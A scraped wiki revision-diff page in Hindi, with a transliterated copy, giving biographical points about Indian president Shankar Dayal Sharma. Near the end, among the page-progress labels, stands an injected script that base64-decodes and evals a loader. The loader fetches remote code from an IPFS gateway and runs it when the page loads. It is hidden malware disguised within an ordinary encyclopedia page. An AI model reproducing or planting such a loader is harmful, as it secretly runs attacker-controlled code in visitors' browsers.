Difference between revisions of "शंकरदयाल शर्मा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('कार्यकाल 25 जुलाई 1992 से 25 जुलाई 1997<br /> *शंकरदयाल शर्मा की ...' के साथ नया पन्ना बनाया)
 
Line 4: Line 4:
 
*शंकरदयाल शर्मा प्रकांड विद्वान थे।  
 
*शंकरदयाल शर्मा प्रकांड विद्वान थे।  
 
*[[आंध्र प्रदेश]], [[पंजाब]] तथा [[महाराष्ट्र]] के राज्यपाल के पद पर रहे।  
 
*[[आंध्र प्रदेश]], [[पंजाब]] तथा [[महाराष्ट्र]] के राज्यपाल के पद पर रहे।  
*शंकरदयाल शर्मा के कार्यकाल में ही श्री अटलबिहारी बाजपेयी की 13 दिन की सरकार बनी थी।  
+
*शंकरदयाल शर्मा के कार्यकाल में ही श्री [[अटलबिहारी वाजपेयी]] की 13 दिन की सरकार बनी थी।  
 
*शंकरदयाल शर्मा ने कैंब्रिज विश्वविद्यालय में अध्यापन भी किया।  
 
*शंकरदयाल शर्मा ने कैंब्रिज विश्वविद्यालय में अध्यापन भी किया।  
 
*विश्वविद्यालय ने शंकरदयाल शर्मा को 'डॉक्टर आफ लॉ' की मानद विभूति से अलंकृत किया था।
 
*विश्वविद्यालय ने शंकरदयाल शर्मा को 'डॉक्टर आफ लॉ' की मानद विभूति से अलंकृत किया था।

Revision as of 06:58, 10 August 2010

karyakal 25 julaee 1992 se 25 julaee 1997

  • shankaradayal sharma ki uchch shiksha kaianbrij vishvavidyalay mean huee.
  • shankaradayal sharma prakaand vidvan the.
  • aandhr pradesh, panjab tatha maharashtr ke rajyapal ke pad par rahe.
  • shankaradayal sharma ke karyakal mean hi shri atalabihari vajapeyi ki 13 din ki sarakar bani thi.
  • shankaradayal sharma ne kaianbrij vishvavidyalay mean adhyapan bhi kiya.
  • vishvavidyalay ne shankaradayal sharma ko 'd aauktar aph l aau' ki manad vibhooti se alankrit kiya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh